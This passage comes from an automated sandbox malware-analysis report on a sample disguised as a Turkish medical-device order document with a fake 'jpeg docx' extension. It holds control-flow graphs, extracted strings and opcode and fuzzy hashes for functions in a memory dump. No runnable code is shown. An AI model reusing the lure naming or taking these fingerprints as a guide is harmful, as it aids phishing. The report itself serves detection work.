                                                                                                                          control_flow_graph 365 12469af-12469e6 366 1246fb1-1246fba 365->366 367 12469ec-12469fa 365->367 372 1246fc1 366->372 370 12469fc-1246a0d 367->370 371 1246a28-1246a39 367->371 370->371 378 1246a0f-1246a1b 370->378 373 1246aaa-1246abe 371->373 374 1246a3b-1246a3f 371->374 372->372 482 1246ac1 call 1246fc7 373->482 483 1246ac1 call 1246fc8 373->483 376 1246a41-1246a4d 374->376 377 1246a5a-1246a63 374->377 380 1246a53-1246a55 376->380 381 1246ddb-1246e26 376->381 382 1246d6c 377->382 383 1246a69-1246a6c 377->383 384 1246d71-1246dd4 378->384 385 1246a21-1246a23 378->385 379 1246ac7-1246acd 386 1246ad6-1246add 379->386 387 1246acf-1246ad1 379->387 388 1246d62-1246d69 380->388 437 1246e2d-1246eac 381->437 382->384 383->382 389 1246a72-1246a91 383->389 384->381 385->388 391 1246ae3-1246afa 386->391 392 1246bcb-1246bdc 386->392 387->388 389->382 403 1246a97-1246a9d 389->403 391->392 402 1246b00-1246b0c 391->402 400 1246c06-1246c0c 392->400 401 1246bde-1246beb 392->401 405 1246c27-1246c2d 400->405 406 1246c0e-1246c1a 400->406 401->405 418 1246bed-1246bf9 401->418 407 1246bc4-1246bc6 402->407 408 1246b12-1246b7e 402->408 403->366 410 1246aa3-1246aa7 403->410 414 1246c33-1246c50 405->414 415 1246d5f 405->415 412 1246c20-1246c22 406->412 413 1246ec3-1246f26 406->413 407->388 439 1246b80-1246baa 408->439 440 1246bac-1246bc1 408->440 410->373 412->388 462 1246f2d-1246fac 413->462 414->382 430 1246c56-1246c59 414->430 415->388 421 1246eb1-1246ebc 418->421 422 1246bff-1246c01 418->422 421->413 422->388 430->366 433 1246c5f-1246c85 430->433 433->415 443 1246c8b-1246c97 433->443 439->440 440->407 446 1246c9d-1246d15 443->446 447 1246d5b-1246d5d 443->447 465 1246d17-1246d41 446->465 466 1246d43-1246d58 446->466 447->388 465->466 466->447 482->379 483->379
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (oq$Hq
                                                                                                                          • API String ID: 0-2917151738
                                                                                                                          • Opcode ID: aa3aa6c8cb88a855851c9f12a2e00629cd4017e1d608b752524e830905467be8
                                                                                                                          • Instruction ID: 94a51b10a39ae7d686e2baa82c40fcf15056fcd0c166ff34ff69439dcc128fd9
                                                                                                                          • Opcode Fuzzy Hash: aa3aa6c8cb88a855851c9f12a2e00629cd4017e1d608b752524e830905467be8
                                                                                                                          • Instruction Fuzzy Hash: 17029E70A1021A8FDB18DF69D854BAEBBB6BFC9700F248519E9469B394DF309D41CB90
                                                                                                                          Function 01243E09 Relevance: 2.8, Strings: 2, Instructions: 267COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 484 1243e09-1243e25 485 1243e27-1243e29 484->485 486 1243e2e-1243e3e 484->486 487 12440cc-12440d3 485->487 488 1243e45-1243e55 486->488 489 1243e40 486->489 491 12440b3-12440c1 488->491 492 1243e5b-1243e69 488->492 489->487 495 12440d4-1244152 491->495 497 12440c3-12440c7 call 12402c8 491->497 492->495 496 1243e6f 492->496 496->495 498 1244084-12440a5 call 12428f0 496->498 499 1243f26-1243f47 496->499 500 1244067-1244082 call 12402d8 496->500 501 12440a7-12440b1 496->501 502 1243f00-1243f21 496->502 503 1243f4c-1243f6d 496->503 504 1243fcc-1244009 496->504 505 1243e8d-1243eae 496->505 506 124400e-1244034 496->506 507 1243e76-1243e88 496->507 508 1243f72-1243f9a 496->508 509 1243eb3-1243ed5 496->509 510 1243f9f-1243fc7 496->510 511 1244039-1244065 496->511 512 1243eda-1243efb 496->512 497->487 498->487 499->487 500->487 501->487 502->487 503->487 504->487 505->487 506->487 507->487 508->487 509->487 510->487 511->487 512->487
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Xq$$q
                                                                                                                          • API String ID: 0-855381642
                                                                                                                          • Opcode ID: beaf0f0a0fa264c1b78915f1832b6cac98c1dc36148742ded5a191dc6de1f56d
                                                                                                                          • Instruction ID: f7afe1221e86f0ba4ce833b0265e729f7e1d09aa4768929e2f8f12cc898a0477
                                                                                                                          • Opcode Fuzzy Hash: beaf0f0a0fa264c1b78915f1832b6cac98c1dc36148742ded5a191dc6de1f56d
                                                                                                                          • Instruction Fuzzy Hash: FA91B134F14259DFEB2CABB5941537EBBA2BFC8300B04852DE502E7288CE35CD568795
                                                                                                                          Function 0124C146 Relevance: 2.7, Strings: 2, Instructions: 226COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 654 124c146-124c158 655 124c184 654->655 656 124c15a-124c172 654->656 657 124c186-124c187 655->657 661 124c174-124c179 656->661 662 124c17b-124c17e 656->662 659 124c188-124c18a 657->659 661->657 663 124c180-124c182 662->663 664 124c18b 662->664 663->655 663->656 665 124c18c-124c199 664->665 665->655 666 124c19b-124c19d 665->666 666->659 667 124c19f-124c1a1 666->667 667->665 668 124c1a3-124c1c8 667->668 669 124c1cf-124c2ac call 12441a0 call 1243cc0 668->669 670 124c1ca 668->670 680 124c2b3-124c2d4 call 1245658 669->680 681 124c2ae 669->681 670->669 683 124c2d9-124c2e4 680->683 681->680 684 124c2e6 683->684 685 124c2eb-124c2ef 683->685 684->685 686 124c2f4-124c2fb 685->686 687 124c2f1-124c2f2 685->687 689 124c302-124c310 686->689 690 124c2fd 686->690 688 124c313-124c357 687->688 694 124c3bd-124c3d4 688->694 689->688 690->689 696 124c3d6-124c3fb 694->696 697 124c359-124c36f 694->697 704 124c413 696->704 705 124c3fd-124c412 696->705 701 124c371-124c37d 697->701 702 124c399 697->702 706 124c387-124c38d 701->706 707 124c37f-124c385 701->707 703 124c39f-124c3bc 702->703 703->694 705->704 708 124c397 706->708 707->708 708->703
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: PHq$PHq
                                                                                                                          • API String ID: 0-1274609152
                                                                                                                          • Opcode ID: edd5773d08c948fcec16942fb6819e4b192419615c0efcf0e116499f29607ea7
                                                                                                                          • Instruction ID: f3107d3972b954b5a012e4d710edabc1e38289b0f756a8c4e599a15197fc9cda
                                                                                                                          • Opcode Fuzzy Hash: edd5773d08c948fcec16942fb6819e4b192419615c0efcf0e116499f29607ea7
                                                                                                                          • Instruction Fuzzy Hash: E5A11974E11219DFDB18DFAAD984A9DFBF2BF88300F148069E509AB361DB709941CF50
                                                                                                                          Function 01245362 Relevance: 2.7, Strings: 2, Instructions: 193COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 786 1245362-1245364 787 12453c4-1245484 call 12441a0 call 1243cc0 786->787 788 1245366-12453a0 786->788 800 1245486 787->800 801 124548b-12454a9 787->801 789 12453a7-12453c2 788->789 790 12453a2 788->790 789->787 790->789 800->801 831 12454ac call 1245658 801->831 832 12454ac call 1245649 801->832 802 12454b2-12454bd 803 12454c4-12454c8 802->803 804 12454bf 802->804 805 12454cd-12454d4 803->805 806 12454ca-12454cb 803->806 804->803 808 12454d6 805->808 809 12454db-12454e9 805->809 807 12454ec-1245530 806->807 813 1245596-12455ad 807->813 808->809 809->807 815 1245532-1245548 813->815 816 12455af-12455d4 813->816 820 1245572 815->820 821 124554a-1245556 815->821 823 12455d6-12455eb 816->823 824 12455ec 816->824 822 1245578-1245595 820->822 825 1245560-1245566 821->825 826 1245558-124555e 821->826 822->813 823->824 827 1245570 825->827 826->827 827->822 831->802 832->802
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: PHq$PHq
                                                                                                                          • API String ID: 0-1274609152
                                                                                                                          • Opcode ID: d8c85d2058dd231ecfd37a0f8d4fdd88e9ded9c6efad6040ed52f2ed9080b80d
                                                                                                                          • Instruction ID: f1d7d39625cf2732b202ab35ae64263394ea2336ee2a2ccce5ed99257bfad1f8
                                                                                                                          • Opcode Fuzzy Hash: d8c85d2058dd231ecfd37a0f8d4fdd88e9ded9c6efad6040ed52f2ed9080b80d
                                                                                                                          • Instruction Fuzzy Hash: 9A91E674E10218CFDB18DFAAD984A9DBBF2BF88300F14C069E949AB365DB309845CF51
                                                                                                                          Function 0124CFF7 Relevance: 2.7, Strings: 2, Instructions: 185COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 833 124cff7-124d028 834 124d02f-124d10c call 12441a0 call 1243cc0 833->834 835 124d02a 833->835 845 124d113-124d134 call 1245658 834->845 846 124d10e 834->846 835->834 848 124d139-124d144 845->848 846->845 849 124d146 848->849 850 124d14b-124d14f 848->850 849->850 851 124d154-124d15b 850->851 852 124d151-124d152 850->852 854 124d162-124d170 851->854 855 124d15d 851->855 853 124d173-124d1b7 852->853 859 124d21d-124d234 853->859 854->853 855->854 861 124d236-124d25b 859->861 862 124d1b9-124d1cf 859->862 868 124d273 861->868 869 124d25d-124d272 861->869 866 124d1d1-124d1dd 862->866 867 124d1f9 862->867 870 124d1e7-124d1ed 866->870 871 124d1df-124d1e5 866->871 872 124d1ff-124d21c 867->872 869->868 873 124d1f7 870->873 871->873 872->859 873->872
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: PHq$PHq
                                                                                                                          • API String ID: 0-1274609152
                                                                                                                          • Opcode ID: 6505a18b47bc827bf10f97499b61d24f5e0ecda35842b2cb7266092c33c398ee
                                                                                                                          • Instruction ID: 391effc10a71050f132a506f4304092f8f8cdb6402f6884cb087674a4968e464
                                                                                                                          • Opcode Fuzzy Hash: 6505a18b47bc827bf10f97499b61d24f5e0ecda35842b2cb7266092c33c398ee
                                                                                                                          • Instruction Fuzzy Hash: 2981C574E10219CFDB18DFAAD984A9DBBF2BF88300F14C069E919AB365DB709941CF10
                                                                                                                          Function 0124C738 Relevance: 2.7, Strings: 2, Instructions: 183COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 877 124c738-124c768 878 124c76f-124c7ce call 12441a0 877->878 879 124c76a 877->879 883 124c7d3-124c84c call 1243cc0 878->883 879->878 889 124c853-124c884 call 1245658 883->889 890 124c84e 883->890 893 124c886 889->893 894 124c88b-124c88f 889->894 890->889 893->894 895 124c894-124c89b 894->895 896 124c891-124c892 894->896 898 124c8a2-124c8b0 895->898 899 124c89d 895->899 897 124c8b3-124c8f7 896->897 903 124c95d-124c974 897->903 898->897 899->898 905 124c976-124c99b 903->905 906 124c8f9-124c90f 903->906 912 124c9b3 905->912 913 124c99d-124c9b2 905->913 910 124c911-124c91d 906->910 911 124c939 906->911 914 124c927-124c92d 910->914 915 124c91f-124c925 910->915 916 124c93f-124c95c 911->916 913->912 917 124c937 914->917 915->917 916->903 917->916
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: PHq$PHq
                                                                                                                          • API String ID: 0-1274609152
                                                                                                                          • Opcode ID: 3c0f7d9e21fd7130d83baf7203933331d73cb176f2f036409a04d81f0f9cc835
                                                                                                                          • Instruction ID: 34851da54bae81b5d8624991ec55526a28c321b9d4d05006cf35f1eb73823949
                                                                                                                          • Opcode Fuzzy Hash: 3c0f7d9e21fd7130d83baf7203933331d73cb176f2f036409a04d81f0f9cc835
                                                                                                                          • Instruction Fuzzy Hash: 3381E574E11219DFEB18DFAAD984A9DBBF2BF88300F14C069E419AB365DB709841CF50
                                                                                                                          Function 0124C473 Relevance: 2.7, Strings: 2, Instructions: 181COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 921 124c473-124c498 922 124c49f-124c57c call 12441a0 call 1243cc0 921->922 923 124c49a 921->923 933 124c583-124c5a4 call 1245658 922->933 934 124c57e 922->934 923->922 936 124c5a9-124c5b4 933->936 934->933 937 124c5b6 936->937 938 124c5bb-124c5bf 936->938 937->938 939 124c5c4-124c5cb 938->939 940 124c5c1-124c5c2 938->940 942 124c5d2-124c5e0 939->942 943 124c5cd 939->943 941 124c5e3-124c627 940->941 947 124c68d-124c6a4 941->947 942->941 943->942 949 124c6a6-124c6cb 947->949 950 124c629-124c63f 947->950 957 124c6e3 949->957 958 124c6cd-124c6e2 949->958 954 124c641-124c64d 950->954 955 124c669 950->955 959 124c657-124c65d 954->959 960 124c64f-124c655 954->960 956 124c66f-124c68c 955->956 956->947 958->957 961 124c667 959->961 960->961 961->956
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: PHq$PHq
                                                                                                                          • API String ID: 0-1274609152
                                                                                                                          • Opcode ID: f8ead1bd792d2c9ddbc3dda45a71294f9e2f99ebeba27d0c95f071d5d69770c4
                                                                                                                          • Instruction ID: 755e360d5299837123af63b7e17601541cadeaefa640a93c2d7f9212ea2d0e93
                                                                                                                          • Opcode Fuzzy Hash: f8ead1bd792d2c9ddbc3dda45a71294f9e2f99ebeba27d0c95f071d5d69770c4
                                                                                                                          • Instruction Fuzzy Hash: 8481D574E11219CFEB18DFAAD984A9DBBF2BF88300F14D069E519AB365DB309941CF50
                                                                                                                          Function 0124CD33 Relevance: 2.7, Strings: 2, Instructions: 181COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 965 124cd33-124cd58 966 124cd5f-124cdbe call 12441a0 965->966 967 124cd5a 965->967 971 124cdc3-124ce3c call 1243cc0 966->971 967->966 977 124ce43-124ce74 call 1245658 971->977 978 124ce3e 971->978 981 124ce76 977->981 982 124ce7b-124ce7f 977->982 978->977 981->982 983 124ce84-124ce8b 982->983 984 124ce81-124ce82 982->984 986 124ce92-124cea0 983->986 987 124ce8d 983->987 985 124cea3-124cee7 984->985 991 124cf4d-124cf64 985->991 986->985 987->986 993 124cf66-124cf8b 991->993 994 124cee9-124ceff 991->994 1000 124cfa3 993->1000 1001 124cf8d-124cfa2 993->1001 998 124cf01-124cf0d 994->998 999 124cf29 994->999 1002 124cf17-124cf1d 998->1002 1003 124cf0f-124cf15 998->1003 1004 124cf2f-124cf4c 999->1004 1001->1000 1005 124cf27 1002->1005 1003->1005 1004->991 1005->1004
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: PHq$PHq
                                                                                                                          • API String ID: 0-1274609152
                                                                                                                          • Opcode ID: b720c8173d07341c0dd0b3a03c2350010fbefba686be9895eccdfb6e6e58390b
                                                                                                                          • Instruction ID: cfb17264bb2315a6ade8c8865c8e41d13a3ee3ae512ba9e27940ef23e2255a6c
                                                                                                                          • Opcode Fuzzy Hash: b720c8173d07341c0dd0b3a03c2350010fbefba686be9895eccdfb6e6e58390b
                                                                                                                          • Instruction Fuzzy Hash: 1581C674E11218CFDB18DFAAD884A9DBBF2BF88300F14C06AE919AB365DB745941CF50
                                                                                                                          Function 0124D2D7 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1009 124d2d7-124d2f8 1010 124d2ff-124d3dc call 12441a0 call 1243cc0 1009->1010 1011 124d2fa 1009->1011 1021 124d3e3-124d404 call 1245658 1010->1021 1022 124d3de 1010->1022 1011->1010 1024 124d409-124d414 1021->1024 1022->1021 1025 124d416 1024->1025 1026 124d41b-124d41f 1024->1026 1025->1026 1027 124d424-124d42b 1026->1027 1028 124d421-124d422 1026->1028 1030 124d432-124d440 1027->1030 1031 124d42d 1027->1031 1029 124d443-124d487 1028->1029 1035 124d4ed-124d504 1029->1035 1030->1029 1031->1030 1037 124d506-124d52b 1035->1037 1038 124d489-124d49f 1035->1038 1044 124d543 1037->1044 1045 124d52d-124d542 1037->1045 1042 124d4a1-124d4ad 1038->1042 1043 124d4c9 1038->1043 1046 124d4b7-124d4bd 1042->1046 1047 124d4af-124d4b5 1042->1047 1048 124d4cf-124d4ec 1043->1048 1045->1044 1049 124d4c7 1046->1049 1047->1049 1048->1035 1049->1048
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: PHq$PHq
                                                                                                                          • API String ID: 0-1274609152
                                                                                                                          • Opcode ID: 637585b12fdb06602c31eca6839fd9b6e0418a497076ef793bef846baf52f52a
                                                                                                                          • Instruction ID: d3b4d30e11042c36585d0fd6e722da9d399e5100709218383df9b0d90e967d11
                                                                                                                          • Opcode Fuzzy Hash: 637585b12fdb06602c31eca6839fd9b6e0418a497076ef793bef846baf52f52a
                                                                                                                          • Instruction Fuzzy Hash: 9D81B474E10218CFDB18DFAAD984A9DBBF2BF88310F14C069E519AB365DB709941CF50
                                                                                                                          Function 0124D5A3 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 1053 124d5a3-124d5c8 1054 124d5cf-124d6ac call 12441a0 call 1243cc0 1053->1054 1055 124d5ca 1053->1055 1065 124d6b3-124d6d4 call 1245658 1054->1065 1066 124d6ae 1054->1066 1055->1054 1068 124d6d9-124d6e4 1065->1068 1066->1065 1069 124d6e6 1068->1069 1070 124d6eb-124d6ef 1068->1070 1069->1070 1071 124d6f4-124d6fb 1070->1071 1072 124d6f1-124d6f2 1070->1072 1074 124d702-124d710 1071->1074 1075 124d6fd 1071->1075 1073 124d713-124d757 1072->1073 1079 124d7bd-124d7d4 1073->1079 1074->1073 1075->1074 1081 124d7d6-124d7fb 1079->1081 1082 124d759-124d76f 1079->1082 1091 124d813 1081->1091 1092 124d7fd-124d812 1081->1092 1086 124d771-124d77d 1082->1086 1087 124d799 1082->1087 1088 124d787-124d78d 1086->1088 1089 124d77f-124d785 1086->1089 1090 124d79f-124d7bc 1087->1090 1093 124d797 1088->1093 1089->1093 1090->1079 1092->1091 1093->1090
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: PHq$PHq
                                                                                                                          • API String ID: 0-1274609152
                                                                                                                          • Opcode ID: a684c5b43e4b1bf2119d99ac4bdae81efd8cc6fc7995009f836f20c35259b2d3
                                                                                                                          • Instruction ID: 9ab246a69f297cca7459f4ea9250a5b0e6fb43606a930dd3801d75330a21cf82
                                                                                                                          • Opcode Fuzzy Hash: a684c5b43e4b1bf2119d99ac4bdae81efd8cc6fc7995009f836f20c35259b2d3
                                                                                                                          • Instruction Fuzzy Hash: EA81C774E10258CFEB18DFAAD984A9DBBF2BF88300F14C069E519AB365DB309941CF10
                                                                                                                          Function 0124EC18 Relevance: .1, Instructions: 147COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 9fb91e9d0737fb157838feebcad05e31a2dc19803ff2913e0c7e1b92235b5d25
                                                                                                                          • Instruction ID: 69d0fddebd68caf5a43c3a4e856367937751ecfca37148c1ff2425df16c5fd3e
                                                                                                                          • Opcode Fuzzy Hash: 9fb91e9d0737fb157838feebcad05e31a2dc19803ff2913e0c7e1b92235b5d25
                                                                                                                          • Instruction Fuzzy Hash: 17519674E10309DFEB18DFAAD494A9DBBB2BF89300F249129E915AB364DB345841CF54
                                                                                                                          Function 0124EC0F Relevance: .1, Instructions: 144COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e8bcd374a054dca9309c2d1fb0d90c28e667a0c00d22563c6b89714140115051
                                                                                                                          • Instruction ID: b1f786570ad9bd7b8e24a0eea9c6a3f337d5c7cfbbea75014a7019871dcc6960
                                                                                                                          • Opcode Fuzzy Hash: e8bcd374a054dca9309c2d1fb0d90c28e667a0c00d22563c6b89714140115051
                                                                                                                          • Instruction Fuzzy Hash: 0951A774E10209DFEB18DFAAD594A9DBBB2FF88300F24D12AE815AB364DB345841CF14
                                                                                                                          Function 012476F8 Relevance: 10.4, Strings: 8, Instructions: 448COMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 0 12476f8-1247725 1 1247b54-1247b58 0->1 2 124772b-124774e 0->2 3 1247b71-1247b7f 1->3 4 1247b5a-1247b6e 1->4 11 1247754-1247761 2->11 12 12477fc-1247800 2->12 9 1247bf0-1247c05 3->9 10 1247b81-1247b96 3->10 18 1247c07-1247c0a 9->18 19 1247c0c-1247c19 9->19 20 1247b9d-1247baa 10->20 21 1247b98-1247b9b 10->21 24 1247770 11->24 25 1247763-124776e 11->25 15 1247802-1247810 12->15 16 1247848-1247851 12->16 15->16 36 1247812-124782d 15->36 22 1247c67 16->22 23 1247857-1247861 16->23 26 1247c1b-1247c56 18->26 19->26 27 1247bac-1247bed 20->27 21->27 30 1247c6c-1247c81 22->30 23->1 28 1247867-1247870 23->28 31 1247772-1247774 24->31 25->31 72 1247c5d-1247c64 26->72 34 1247872-1247877 28->34 35 124787f-124788b 28->35 31->12 39 124777a-12477dc 31->39 34->35 35->30 37 1247891-1247897 35->37 57 124782f-1247839 36->57 58 124783b 36->58 42 124789d-12478ad 37->42 43 1247b3e-1247b42 37->43 84 12477e2-12477f9 39->84 85 12477de 39->85 55 12478c1-12478c3 42->55 56 12478af-12478bf 42->56 43->22 47 1247b48-1247b4e 43->47 47->1 47->28 60 12478c6-12478cc 55->60 56->60 61 124783d-124783f 57->61 58->61 60->43 67 12478d2-12478e1 60->67 61->16 68 1247841 61->68 69 12478e7 67->69 70 124798f-12479ba call 1247538 * 2 67->70 68->16 74 12478ea-12478fb 69->74 89 1247aa4-1247abe 70->89 90 12479c0-12479c4 70->90 74->30 76 1247901-1247913 74->76 76->30 79 1247919-1247931 76->79 141 1247933 call 12480d7 79->141 142 1247933 call 12480d8 79->142 82 1247939-1247949 82->43 83 124794f-1247952 82->83 87 1247954-124795a 83->87 88 124795c-124795f 83->88 84->12 85->84 87->88 92 1247965-1247968 87->92 88->22 88->92 89->1 108 1247ac4-1247ac8 89->108 90->43 91 12479ca-12479ce 90->91 95 12479f6-12479fc 91->95 96 12479d0-12479dd 91->96 97 1247970-1247973 92->97 98 124796a-124796e 92->98 100 1247a37-1247a3d 95->100 101 12479fe-1247a02 95->101 111 12479ec 96->111 112 12479df-12479ea 96->112 97->22 99 1247979-124797d 97->99 98->97 98->99 99->22 106 1247983-1247989 99->106 103 1247a3f-1247a43 100->103 104 1247a49-1247a4f 100->104 101->100 107 1247a04-1247a0d 101->107 103->72 103->104 109 1247a51-1247a55 104->109 110 1247a5b-1247a5d 104->110 106->70 106->74 113 1247a1c-1247a32 107->113 114 1247a0f-1247a14 107->114 115 1247b04-1247b08 108->115 116 1247aca-1247ad4 call 12463e0 108->116 109->43 109->110 117 1247a92-1247a94 110->117 118 1247a5f-1247a68 110->118 119 12479ee-12479f0 111->119 112->119 113->43 114->113 115->72 121 1247b0e-1247b12 115->121 116->115 129 1247ad6-1247aeb 116->129 117->43 126 1247a9a-1247aa1 117->126 124 1247a77-1247a8d 118->124 125 1247a6a-1247a6f 118->125 119->43 119->95 121->72 127 1247b18-1247b25 121->127 124->43 125->124 132 1247b34 127->132 133 1247b27-1247b32 127->133 129->115 138 1247aed-1247b02 129->138 135 1247b36-1247b38 132->135 133->135 135->43 135->72 138->1 138->115 141->82 142->82
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.3781693751.0000000001240000.00000040.00000800.00020000.00000000.sdmp, Offset: 01240000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_1240000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (oq$(oq$(oq$(oq$(oq$(oq$,q$,q
                                                                                                                          • API String ID: 0-2212926057
                                                                                                                          • Opcode ID: e267bc04467dafe535c930919b42a55533e02907c382ccdd7ef3af3662d8c006
                                                                                                                          • Instruction ID: 96c2b0e6b90ba75b6463aef0351dd82c8125f0eb4692fbebeee22606a14e66ca
                                                                                                                          • Opcode Fuzzy Hash: e267bc04467dafe535c930919b42a55533e02907c382ccdd7ef3af3662d8c006
